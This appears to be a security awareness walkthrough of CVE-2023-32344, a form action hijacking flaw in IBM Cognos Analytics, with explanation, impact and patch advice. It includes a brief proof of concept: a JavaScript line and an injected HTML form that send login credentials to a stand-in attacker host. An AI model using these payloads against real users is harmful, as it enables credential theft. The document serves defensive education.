On May 31, 2023, IBM released security details about a serious vulnerability affecting several versions of their business analytics platform Cognos Analytics. This bug, tracked as CVE-2023-32344 (IBM X-Force ID: 255898), lets an attacker tamper with where a web form sends its data — a classic example of form action hijacking. In simple terms, this means a hacker can trick Cognos users into sending sensitive data (like login info!) to an attacker-controlled location.
If you’re responsible for any Cognos deployment — especially versions 11.1.7, 11.2.4, or 12.. — read on. We’ll break down what’s going on, walk through an exploit proof-of-concept, and show you how to stay protected.
What Is Form Action Hijacking?
Web forms do a lot of heavy lifting. They let you log in, search, enter data, order stuff, and more. Every time you hit “Submit,” the browser sends your information to a web address called the action.
Form action hijacking means the form’s action address gets changed by a crafty attacker. When you hit submit, your info goes somewhere the site owner never intended — often straight to the bad guys.
Cognos Analytics 12..
Vulnerability Type: Form action hijack (Improper authentication/sanitization in web forms)
Danger: The form’s action attribute can be manipulated to send user data (logins, search queries, etc.) to any URL chosen by an attacker.
Reference
- IBM Advisory
- NVD: CVE-2023-32344
How Attackers Exploit This Vulnerability
1. Social engineering & link tampering: The attacker creates a malicious link or injects JavaScript into a Cognos page that changes the form’s action to a server they control.
2. Data snatching: Unsuspecting user submits a form — login, upload, etc. — and their data heads right to the attacker’s site.
Suppose we have a Cognos Analytics login page form
<form id="loginForm" method="POST" action="/ibmcognos/bi/v1/disp">
<input type="text" name="username">
<input type="password" name="password">
<input type="submit" value="Login">
</form>
Inject JavaScript to change the action attribute
document.getElementById('loginForm').action = 'https://evil.example.com/steal';;
*This can be done via stored XSS (if possible), through a malicious bookmarklet, or by getting a victim to visit a specially crafted page that runs this script in their browser (e.g., via a phishing email).*
2. User submits credentials, which are now POSTed straight to https://evil.example.com/steal.
Or, with direct HTML injection (less likely, but possible in some custom configurations)
<form id="loginForm" method="POST" action="https://evil.example.com/steal">;
<input type="text" name="username">
<input type="password" name="password">
<input type="submit" value="Login">
</form>
Result? Usernames and passwords — or any submitted form data — go right to the attacker.
Remote attackers: If they can inject scripts or malicious links, they can exploit this.
- Potential damage: Stolen credentials (leading to full environment compromise), sensitive data leaks, phishing attacks against employees, and loss of trust.
IBM has released updates and hotfixes for supported versions!
- Patch as soon as possible: IBM Cognos Update Instructions
References & Further Reading
- IBM Security Bulletin: CVE-2023-32344
- National Vulnerability Database (NVD) CVE-2023-32344
- OWASP: Cross-Site Scripting (XSS)
- IBM X-Force Database: 255898 (registration may be required)
Summary
CVE-2023-32344 is a prime example of how something as simple as an HTML form’s attribute can open the gates to powerful attacks. If you run IBM Cognos Analytics version 11.1.7, 11.2.4, or 12.., patch right away. Educate your users, and audit for tampered forms.
Stay safe, and keep your analytics truly *yours*.
*(This is an exclusive walk-through written for awareness. For the latest and most accurate guidance, always consult IBM’s official security bulletins.)*
Timeline
Published on: 02/26/2024 16:27:46 UTC
Last modified on: 02/26/2024 16:32:25 UTC